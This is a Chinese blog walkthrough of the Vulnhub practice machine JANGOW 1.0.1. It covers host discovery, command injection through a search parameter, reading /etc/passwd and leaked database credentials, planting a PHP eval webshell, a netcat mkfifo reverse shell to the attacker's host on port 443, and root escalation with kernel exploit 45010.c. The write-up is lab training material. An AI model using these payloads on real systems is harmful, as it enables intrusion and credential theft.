【Vulnhub靶机】JANGOW 1.0.1

已于 2023-11-25 12:53:04 修改
阅读量372 收藏 2
点赞数 2
分类专栏: # 靶机系列 文章标签: vulnhub web安全 网络安全 安全
于 2023-09-23 09:23:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/133197586
版权
文章描述了一次针对JANGOW1.0.1靶机的攻击过程,包括网卡配置信息收集、主机发现、端口扫描,发现漏洞并利用echo命令执行木马,通过反弹Shell获取webshell权限,以及后续的提权尝试。作者展示了如何绕过防火墙限制和使用exploits进行提权操作。
摘要由CSDN通过智能技术生成

文章目录

靶机文档:JANGOW 1.0.1

下载地址:Download (Mirror)

难易程度:.

image-20230920144550613

网卡配置

水果味儿

信息收集

主机发现

image-20230920152630055

端口扫描

image-20230920201852054

访问80端口

image-20230920202810203

点击site目录

image-20230920203029833

点击页面上方的一个选项,发现Buscar的页面空白,而且地址栏的url看着可以输入一些东西

http://192.168.8.16/site/busque.php?buscar=

image-20230920204302463

?buscar=后面加上pwd,显示了当前路径

/site/busque.php?buscar=pwd

image-20230920204401670

/site/busque.php?buscar=cat%20/etc/passwd

image-20230920204425345

/site/busque.php?buscar=ls%20-a 发现了wordpress

image-20230920204650712

查看wordpress里都有什么文件 ls wordpress
image-20230920204754415

查看cat%20wordpress/config.php,页面空白,需要查看页面源代码

image-20230920204902308

发现了数据库配置

$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";

漏洞利用

使用命令执行,写入一句话木马

echo '<?php @eval($_POST[6868]);' >6868.php

image-20230920205153573

使用蚁剑连接一句话,拿到webshell

image-20230920205655894

site目录同级下,有一个隐藏的.backup文件

image-20230920205923383

$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";

image-20230920205820248

拿到webshell权限极低,啥也干不了

反弹Shell

查看攻略,该网站限制了一些端口,只能通过443端口进行访问

/etc/ufw/applications.d/

image-20230920213735426

查看apache2-utils.ufw.profile文件

image-20230920213857882

上传木马

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.8 443 >/tmp/f');?>

image-20230920214035452

kali监听443端口

访问该木马文件

image-20230920215215714

成功反弹到

image-20230920215227513

提权

交换shell

python3 -c "import pty;pty.spawn('/bin/bash')"

查看内核版本

在这里插入图片描述

搜索相关漏洞

searchsploit ubuntu 4.4.0-31

image-20230920215601443

searchsploit  -p linux/local/45010.c

image-20230920215621804

45010.c上传的靶机

我先发送到我本机,然后本机上传到蚁剑上

image-20230920215827476

image-20230920215934955

赋予可执行权限,然后进行编译

image-20230920220121864

上传一个a.out文件,执行它

image-20230920220221251

切到/root目录下

image-20230920220243197

靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞提权
YouthBelief的博客
01-20 3133
0x00 环境准备 下载链接 https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 靶机介绍 难度:简单 上架时间:2021年11月4日 提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com 靶机配置 virtual box 启动,与kali配置同一网卡。 0x01 信息收集 靶机ip探测 端口服务识别 21/tcp ope
【靶场练习】Vulnhub靶场Jangow01-练习记录
weixin_36591264的博客
02-16 3661
Vulnhub靶场Jangow01-练习记录信息收集反弹shell提权操作 信息收集 目标机IP:192.168.43.163 攻击机IP:192.168.43.118 端口扫描:nmap -sC -sV 192.168.43.163 开放21,80两个端口,通过浏览器访问80端口: 点site后,进入了一个正常的页面 点击页面上的标签,直到点击右上角Buscar的时候,页面跳转到http://192.168.43.163/site/busque.php?buscar= buscar作为一个变量,尝试
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3297
一次打靶记录。
Vulnhub - JANGOW: 1.0.1
shuozhuqiu6452的博客
12-05 212
vulnhub - JANGOW: 1.0.1
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2768
迟到的文章,就当库存发出来吧~
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4370
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
Vulnhub靶机随笔-Jangow 1.0.1
weixin_59005129的博客
03-21 710
C.提权 内核提权 第三步 通过SCP将45010.c文件从Linux中传输到物理机中 在Windows的cmd中输入下方命令 这里需要将ssh的配置文件更改为允许root登录 命令: scp root@攻击机IP:文件所在位置 ./ 第五步 通过gcc编译45010.c文件 命令: gcc 45010.c -o exp 这里不用加-c参数
Vulnhub靶机JANGOW_ 1.0.1
LainWith的博客
10-06 1235
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
vulnhub靶机jangow-01-1.0.1
weixin_68416970的博客
08-08 633
保存下面代码为一个 php 文件,重命名为 test.php,上传到靶机的 /var/www/html/site/ 目录下。因为靶机的原因无法使用监听端口的方法传输文件,直接把 45010.c 从 kali 拖到本机桌面,再用蚁剑上传。修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)因为我 kali 的小 bug,这里输入的命令会显示双写,但是不影响命令执行。在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1176
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
防火墙|WAF|漏洞|网络安全
最新发布
qq_43777616的博客
11-06 351
防火墙|WAF|漏洞|网络安全
网络安全从入门到精通(特别篇IIl):应急响应之病毒蠕虫处置流程
HACKONE的博客
11-06 83
排查 init.d 目录下的脚本文件,如果某个脚本启动的服务进程与名称不符,或者脚本文件的内容被修改,加有别的什么东西启动了别的进程,必须仔细排查,极可能是被用来启动后门进程了。排查C: \、C: \winnt、C: \winnt\System 、C: \winnt\ System32、C: \winnt\System32\dllcache、C: \winnt\System32\ drivers、各个Program Files目录下的内容,排查他们目录及文件的属性,若无版本说明,多为可疑文件;
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1492
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
入门网络安全工程师要学习哪些内容(详细教程)
白帽子佳奇的博客
11-06 425
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【知识科普】常见网络安全问题以及应对方式
wendao76的专栏
11-03 654
通过实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值